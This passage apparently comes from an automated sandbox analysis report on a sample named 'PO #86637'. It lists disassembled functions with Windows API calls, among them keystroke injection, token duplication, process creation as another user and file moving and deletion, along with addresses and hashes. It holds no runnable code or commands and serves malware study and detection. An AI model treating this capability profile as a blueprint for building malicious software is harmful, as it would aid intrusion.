                      • GetKeyState.USER32(00000010), ref: 0047C953
                      • GetWindowLongW.USER32(00000002,000000F0), ref: 0047C967
                      • SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C993
                      • SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C9B6
                      • _wcsncpy.LIBCMT ref: 0047CA29
                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047CA5A
                      • SendMessageW.USER32 ref: 0047CA7F
                      • InvalidateRect.USER32(?,00000000,00000001), ref: 0047CADF
                      • SendMessageW.USER32(?,00001030,?,0047EA68), ref: 0047CB84
                      • ImageList_SetDragCursorImage.COMCTL32(009D0880,00000000,00000000,00000000), ref: 0047CB9B
                      • ImageList_BeginDrag.COMCTL32(009D0880,00000000,000000F8,000000F0), ref: 0047CBAC
                      • SetCapture.USER32(?), ref: 0047CBB6
                      • ClientToScreen.USER32(?,?), ref: 0047CC17
                      • ImageList_DragEnter.COMCTL32(00000000,?,?,?,?), ref: 0047CC26
                      • ReleaseCapture.USER32 ref: 0047CC3A
                      • GetCursorPos.USER32(?), ref: 0047CC72
                      • ScreenToClient.USER32(?,?), ref: 0047CC80
                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CCE6
                      • SendMessageW.USER32 ref: 0047CD12
                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CD53
                      • SendMessageW.USER32 ref: 0047CD80
                      • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0047CD99
                      • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0047CDAA
                      • GetCursorPos.USER32(?), ref: 0047CDC8
                      • ScreenToClient.USER32(?,?), ref: 0047CDD6
                      • GetParent.USER32(00000000), ref: 0047CDF7
                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CE60
                      • SendMessageW.USER32 ref: 0047CE93
                      • ClientToScreen.USER32(?,?), ref: 0047CEEE
                      • TrackPopupMenuEx.USER32(?,00000000,?,?,02EE1BC8,00000000,?,?,?,?), ref: 0047CF1C
                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CF46
                      • SendMessageW.USER32 ref: 0047CF6B
                      • ClientToScreen.USER32(?,?), ref: 0047CFB5
                      • TrackPopupMenuEx.USER32(?,00000080,?,?,02EE1BC8,00000000,?,?,?,?), ref: 0047CFE6
                      • GetWindowLongW.USER32(?,000000F0), ref: 0047D086
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: MessageSend$ClientScreen$Image$CursorDragList_State$CaptureLongMenuPopupTrackWindow$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                      • String ID: @GUI_DRAGID$F
                      • API String ID: 3100379633-4164748364
                      • Opcode ID: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                      • Instruction ID: 980357f173c9be8e312ccaa606797ee7157b6525bda81ee0817efdfc4c954517
                      • Opcode Fuzzy Hash: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                      • Instruction Fuzzy Hash: F842AD706043419FD714DF28C884FABB7A5FF89700F14865EFA489B291C7B8E846CB5A
                      Function 00434418 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 133keyboardthreadwindowCOMMON
                      Download Yara Rule
                      APIs
                      • GetForegroundWindow.USER32 ref: 00434420
                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00434446
                      • IsIconic.USER32(?), ref: 0043444F
                      • ShowWindow.USER32(?,00000009), ref: 0043445C
                      • SetForegroundWindow.USER32(?), ref: 0043446A
                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434481
                      • GetCurrentThreadId.KERNEL32 ref: 00434485
                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434493
                      • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A2
                      • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A8
                      • AttachThreadInput.USER32(00000000,?,00000001), ref: 004344B1
                      • SetForegroundWindow.USER32(00000000), ref: 004344B7
                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344C6
                      • keybd_event.USER32(00000012,00000000), ref: 004344CF
                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344DD
                      • keybd_event.USER32(00000012,00000000), ref: 004344E6
                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344F4
                      • keybd_event.USER32(00000012,00000000), ref: 004344FD
                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043450B
                      • keybd_event.USER32(00000012,00000000), ref: 00434514
                      • SetForegroundWindow.USER32(00000000), ref: 0043451E
                      • AttachThreadInput.USER32(00000000,?,00000000), ref: 0043453F
                      • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434545
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: ThreadWindow$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                      • String ID: Shell_TrayWnd
                      • API String ID: 2889586943-2988720461
                      • Opcode ID: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                      • Instruction ID: 0b42b206f44700a00bd4aa1610e9651ae8f7722fee000eb3c659fd44b6abead8
                      • Opcode Fuzzy Hash: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                      • Instruction Fuzzy Hash: AD416272640218BFE7205BA4DE4AFBE7B6CDB58B11F10442EFA01EA1D0D6F458419BA9
                      Function 00446313 Relevance: 37.0, APIs: 17, Strings: 4, Instructions: 234processCOMMON
                      Download Yara Rule
                      APIs
                      • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 0044638E
                      • CloseHandle.KERNEL32(?), ref: 004463A0
                      • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004463B8
                      • GetProcessWindowStation.USER32 ref: 004463D1
                      • SetProcessWindowStation.USER32(00000000), ref: 004463DB
                      • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004463F7
                      • _wcslen.LIBCMT ref: 00446498
                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                      • _wcsncpy.LIBCMT ref: 004464C0
                      • LoadUserProfileW.USERENV(?,00000020), ref: 004464D9
                      • CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 004464F3
                      • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,000F01FF,00000400), ref: 00446522
                      • UnloadUserProfile.USERENV(?,?), ref: 00446555
                      • CloseWindowStation.USER32(00000000), ref: 0044656C
                      • CloseDesktop.USER32(?), ref: 0044657A
                      • SetProcessWindowStation.USER32(?), ref: 00446588
                      • CloseHandle.KERNEL32(?), ref: 00446592
                      • DestroyEnvironmentBlock.USERENV(?), ref: 004465A9
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_wcslen_wcsncpy
                      • String ID: $@OH$default$winsta0
                      • API String ID: 3324942560-3791954436
                      • Opcode ID: 4d1d68c1aea3dabcf030405aafb24e1344eb51be90ba82aa3e7b9bd6ceeac822
                      • Instruction ID: a255b9755a473e3b45922b0ee48cea4cb67e1360e8ecd59b8ab49ad27cdc7b44
                      • Opcode Fuzzy Hash: 4d1d68c1aea3dabcf030405aafb24e1344eb51be90ba82aa3e7b9bd6ceeac822
                      • Instruction Fuzzy Hash: A28180B0A00209ABEF10CFA5DD4AFAF77B8AF49704F05455EF914A7284D778D901CB69
                      Function 004096A0 Relevance: 33.9, APIs: 21, Instructions: 2413COMMON
                      Download Yara Rule
                      APIs
                      • _wcslen.LIBCMT ref: 004096C1
                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                      • _memmove.LIBCMT ref: 0040970C
                        • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                        • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                        • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                      • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00000000), ref: 00409753
                      • _memmove.LIBCMT ref: 00409D96
                      • _memmove.LIBCMT ref: 0040A6C4
                      • _memmove.LIBCMT ref: 004297E5
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: _memmove$std::exception::exception$BuffCharException@8ThrowUpper_malloc_wcslen
                      • String ID:
                      • API String ID: 2383988440-0
                      • Opcode ID: e127891bc0a98d019add158fe61e22172890978285290b421ac62a594046158c
                      • Instruction ID: 3262ed4b583d717621f118bf118656dde374edbe3d76219253c131e703a2432c
                      • Opcode Fuzzy Hash: e127891bc0a98d019add158fe61e22172890978285290b421ac62a594046158c
                      • Instruction Fuzzy Hash: CD13BF706043109FD724DF25D480A2BB7E1BF89304F54896EE8869B392D739EC56CB9B
                      Function 0044BD27 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 178filestringCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                        • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 0043392E
                        • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 00433950
                        • Part of subcall function 00433908: __wcsicoll.LIBCMT ref: 00433974
                        • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                      • _wcscat.LIBCMT ref: 0044BD94
                      • _wcscat.LIBCMT ref: 0044BDBD
                      • __wsplitpath.LIBCMT ref: 0044BDEA
                      • FindFirstFileW.KERNEL32(?,?), ref: 0044BE02
                      • _wcscpy.LIBCMT ref: 0044BE71
                      • _wcscat.LIBCMT ref: 0044BE83
                      • _wcscat.LIBCMT ref: 0044BE95
                      • lstrcmpiW.KERNEL32(?,?), ref: 0044BEC1
                      • DeleteFileW.KERNEL32(?), ref: 0044BED3
                      • MoveFileW.KERNEL32(?,?), ref: 0044BEF3
                      • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF0A
                      • DeleteFileW.KERNEL32(?), ref: 0044BF15
                      • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF2C
                      • FindClose.KERNEL32(00000000), ref: 0044BF33
                      • MoveFileW.KERNEL32(?,?), ref: 0044BF4F
                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 0044BF64
                      • FindClose.KERNEL32(00000000), ref: 0044BF7C
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: File$Find_wcscat$__wsplitpath$CloseCopyDeleteMove$AttributesFirstFullNameNextPath__wcsicoll_wcscpylstrcmpi
                      • String ID: \*.*
                      • API String ID: 2188072990-1173974218
                      • Opcode ID: c24caf0b266a53f5e7acd00b30f5ede1e5d756040c77aa0fe23e7167681731b8
                      • Instruction ID: 72a2fd59153234373391f972af8bc7e503bf673df65afccb4f4ecee040a4f935
                      • Opcode Fuzzy Hash: c24caf0b266a53f5e7acd00b30f5ede1e5d756040c77aa0fe23e7167681731b8
                      • Instruction Fuzzy Hash: E25167B2408384AAD734DB50DC45EDF73E9AFC8304F544E1EF68982141EB75D249CBA6
                      Function 004788BD Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 217timefileCOMMON
                      Download Yara Rule
                      APIs
                      • FindFirstFileW.KERNEL32(00000000,?,?), ref: 004788E4
                      • FindClose.KERNEL32(00000000), ref: 00478924
                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478949
                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478961
                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00478989
                      • __swprintf.LIBCMT ref: 004789D3
                      • __swprintf.LIBCMT ref: 00478A1D
                      • __swprintf.LIBCMT ref: 00478A4B
                      • __swprintf.LIBCMT ref: 00478A79
                        • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 00413314
                        • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 0041332C
                      • __swprintf.LIBCMT ref: 00478AA7
                      • __swprintf.LIBCMT ref: 00478AD5
                      • __swprintf.LIBCMT ref: 00478B03
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem
                      • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                      • API String ID: 999945258-2428617273
                      • Opcode ID: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                      • Instruction ID: 8fd0730747e081185947bc4026d2fd3d0a29cbe563c255e8678d3cf3417a7967
                      • Opcode Fuzzy Hash: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                      • Instruction Fuzzy Hash: 32719772204300ABC310EF55CC85FAFB7E9AF88705F504D2FF645962D1E6B9E944875A
                      Function 004033C0 Relevance: 26.6, APIs: 11, Strings: 4, Instructions: 359COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                      • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                      • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                      • __wsplitpath.LIBCMT ref: 00403492
                        • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                      • _wcscpy.LIBCMT ref: 004034A7
                      • _wcscat.LIBCMT ref: 004034BC
                      • SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                        • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                        • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                        • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                        • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0040355C,?,?,?,00000010), ref: 00403B08
                        • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00403B41
                      • _wcscpy.LIBCMT ref: 004035A0
                      • _wcslen.LIBCMT ref: 00403623
                      • _wcslen.LIBCMT ref: 0040367D
                      Strings
                      • Error opening the file, xrefs: 00428231
                      • #include depth exceeded. Make sure there are no recursive includes, xrefs: 00428200
                      • Unterminated string, xrefs: 00428348
                      • _, xrefs: 0040371C
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpystd::exception::exception$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_memmove_wcscat
                      • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                      • API String ID: 3393021363-188983378
                      • Opcode ID: ce77724faf1e7fbc9fcf9b1a922f2907e035de924d79ec5656a8af7ae9668c55
                      • Instruction ID: 51a390cb75b153cc6cab8b26b712b327f6f81406d0e69f910df9a3585dc9283e
                      • Opcode Fuzzy Hash: ce77724faf1e7fbc9fcf9b1a922f2907e035de924d79ec5656a8af7ae9668c55
                      • Instruction Fuzzy Hash: CCD105B1508341AAD710EF64D841AEFBBE8AF85304F404C2FF98553291DB79DA49C7AB
                      Function 00431A86 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 139fileCOMMON
                      Download Yara Rule
                      APIs
                      • FindFirstFileW.KERNEL32(?,?), ref: 00431AAA
                      • GetFileAttributesW.KERNEL32(?), ref: 00431AE7
                      • SetFileAttributesW.KERNEL32(?,?), ref: 00431AFD
                      • FindNextFileW.KERNEL32(00000000,?), ref: 00431B0F
                      • FindClose.KERNEL32(00000000), ref: 00431B20
                      • FindClose.KERNEL32(00000000), ref: 00431B34
                      • FindFirstFileW.KERNEL32(*.*,?), ref: 00431B4F
                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00431B96
                      • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 00431BBA
                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00431BC2
                      • FindClose.KERNEL32(00000000), ref: 00431BCD
                      • FindClose.KERNEL32(00000000), ref: 00431BDB
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                      • String ID: *.*
                      • API String ID: 1409584000-438819550
                      • Opcode ID: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                      • Instruction ID: b696eadadcb8a1627fc7fa6feda0e6e57aab690e04623b9265854ab7309d24dd
                      • Opcode Fuzzy Hash: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                      • Instruction Fuzzy Hash: CE41D8726002046BC700EF65DC45EAFB3ACAE89311F04592FF954C3190E7B8E519C7A9
                      Function 00431BE8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 116COMMON
                      Download Yara Rule
                      APIs
                      • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00431C09
                      • __swprintf.LIBCMT ref: 00431C2E
                      • _wcslen.LIBCMT ref: 00431C3A
                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 00431C67
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: CreateDirectoryFullNamePath__swprintf_wcslen
                      • String ID: :$\$\??\%s
                      • API String ID: 2192556992-3457252023
                      • Opcode ID: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                      • Instruction ID: 5b8928ca783b893dacbf0721098a8616f59dd17613a34138e213b27d6ec4c177
                      • Opcode Fuzzy Hash: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                      • Instruction Fuzzy Hash: EE413E726403186BD720DB54DC45FDFB3BCFF58710F00859AFA0896191EBB49A548BD8
                      Function 004720DB Relevance: 21.4, APIs: 11, Strings: 1, Instructions: 377timeCOMMON
                      Download Yara Rule
                      APIs
                      • GetLocalTime.KERNEL32(?), ref: 004722A2
                      • __swprintf.LIBCMT ref: 004722B9
                      • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,0048BF68), ref: 004724EC
                      • SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,0048BF68), ref: 00472506
                      • SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,0048BF68), ref: 00472520
                      • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,0048BF68), ref: 0047253A
                      • SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,0048BF68), ref: 00472554
                      • SHGetFolderPathW.SHELL32(00000000,0000002E,00000000,00000000,0048BF68), ref: 0047256E
                      • SHGetFolderPathW.SHELL32(00000000,0000001F,00000000,00000000,0048BF68), ref: 00472588
                      • SHGetFolderPathW.SHELL32(00000000,00000017,00000000,00000000,0048BF68), ref: 004725A2
                      • SHGetFolderPathW.SHELL32(00000000,00000016,00000000,00000000,0048BF68), ref: 004725BC
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: FolderPath$LocalTime__swprintf
                      • String ID: %.3d
                      • API String ID: 3337348382-986655627
                      • Opcode ID: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                      • Instruction ID: 0d137f706e98bab13a4a4c7fcb7914b07bdb7c22a72ec07ab57cd4d47a51df83
                      • Opcode Fuzzy Hash: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                      • Instruction Fuzzy Hash: A6C1EC326101185BD710FBA1DD8AFEE7328EB44701F5045BFF909A60C2DBB99B598F64
                      Function 00442886 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 135fileCOMMON
                      Download Yara Rule
                      APIs
                      • FindFirstFileW.KERNEL32(?,?), ref: 004428A8
                      • FindNextFileW.KERNEL32(00000000,?), ref: 0044290B
                      • FindClose.KERNEL32(00000000), ref: 0044291C
                      • FindClose.KERNEL32(00000000), ref: 00442930
